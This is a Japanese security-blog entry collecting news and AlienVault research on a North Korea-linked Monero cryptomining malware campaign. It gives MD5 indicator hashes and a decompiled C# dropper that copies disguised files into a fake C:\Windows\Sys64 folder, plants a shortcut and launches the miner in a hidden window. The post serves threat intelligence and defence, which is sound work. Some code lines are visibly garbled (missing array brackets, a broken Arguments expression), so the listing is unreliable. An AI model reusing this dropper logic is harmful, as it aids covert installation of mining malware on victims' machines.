【ニュース】

◆北朝鮮ハッカーの新手口、「モネロ採掘」標的に (WSJ, 2018/01/09 06:30)
http://jp.wsj.com/articles/SB11634795812220464149304583626240703581184

【公開情報】

◆A North Korean Monero Cryptocurrency Miner (Alien Vault, 2018/01/08)
https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner

【関連まとめ記事】

◆全体まとめ

◆暗号資産 / 仮想通貨 (まとめ)
https://security-log.hatenablog.com/entry/Cryptographic_Assets

【インディケータ情報】

■ハッシュ情報(MD5)

6a261443299788af1467142d5f538b2c
762c3249904a8bf76802effb54426655
42344bb45f351757e8638656e12a0135

(以上は Alien Vault の情報。 引用元は https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner)

■デコンパイル情報(6a261443299788af1467142d5f538b2c)

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;

namespace ConsoleApp5
{
// Token: 0x02000008 RID: 8
[StandardModule]
internal sealed class Module1
{
// Token: 0x0600000F RID: 15 RVA: 0x00002128 File Offset: 0x00000328
[STAThread]

public static void Main()
{
Console.WriteLine("Aucun argument");
char array = "ABDCEFGHIJKLNMOPQRSTVUWXYZ".ToCharArray();
char array2 = "0123456789".ToCharArray();
Random random = new Random();
string text = string.Empty;
while (text.Length < 6)
{
if (random.Next(0, 2) == 0)
{
text += Conversions.ToString(array[random.Next(0, array.Length)]);
}
else
{
text += Conversions.ToString(array2[random.Next(0, array2.Length)]);
}
}
Console.WriteLine(text);
if (!Directory.Exists("C:\\Windows\\Sys64"))
{
Directory.CreateDirectory("C:\\Windows\\Sys64");
}
if (!Directory.Exists("C:\\SoftwaresInstall"))
{
Directory.CreateDirectory("C:\\SoftwaresInstall");
}
if (!File.Exists("C:\\Windows\\Sys64\\updater.exe"))
{
File.Copy("licence/key.dat", "C:\\Windows\\Sys64\\updater.exe");
}
if (!File.Exists("C:\\Windows\\Sys64\\intelservice.exe"))
{
File.Copy("licence\\licence.dat", "C:\\Windows\\Sys64\\intelservice.exe");
}
File.Copy("setup\\update.exe", "C:\\SoftwaresInstall\\soft" + text + ".exe");
object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", ""));
objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell", ""));
object objectValue2 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "SpecialFolders", new object
{
"Desktop"
}, null, null, null));
object objectValue3 = RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, null, "CreateShortcut", new object
{
Operators.ConcatenateObject(objectValue2, "\\shortcut.lnk")
}, null, null, null));
NewLateBinding.LateSet(objectValue3, null, "TargetPath", new object
{
NewLateBinding.LateGet(objectValue, null, "ExpandEnvironmentStrings", new object
{
"C:\\Windows\\Sys64\\updater.exe"
}, null, null, null)
}, null, null);
NewLateBinding.LateSet(objectValue3, null, "WorkingDirectory", new object
{
NewLateBinding.LateGet(objectValue, null, "ExpandEnvironmentStrings", new object
{
"C:\\Windows\\Sys64"
}, null, null, null)
}, null, null);
NewLateBinding.LateSet(objectValue3, null, "WindowStyle", new object[]
{
4
}, null, null);
NewLateBinding.LateCall(objectValue3, null, "Save", new object[0], null, null, null, true);
Process.Start("C:\\SoftwaresInstall\\soft" + text + ".exe", "");
Console.WriteLine("The number of processors on this computer is {0}.", Environment.ProcessorCount);
int processorCount = Environment.ProcessorCount;
Console.WriteLine(processorCount);
int value = checked(processorCount - 1);
string str = "KJU" + Conversions.ToString(processorCount);
Process.Start(new ProcessStartInfo("C:\\Windows\\Sys64\\intelservice.exe")

{
WindowStyle = ProcessWindowStyle.Hidden,
Arguments = *1 ?? "")
});
}
}
}

(以上は Alien Vault の情報。 引用元は https://www.alienvault.com/blogs/labs-research/a-north-korean-monero-cryptocurrency-miner)